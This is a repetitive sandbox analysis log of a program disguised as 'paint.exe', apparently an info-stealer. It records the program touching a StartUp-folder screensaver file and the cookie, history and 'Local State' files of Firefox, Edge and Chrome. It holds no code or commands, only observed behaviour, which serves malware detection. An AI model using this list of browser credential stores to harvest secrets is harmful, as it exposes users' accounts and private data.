              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\Desktop\paint.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\paint.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
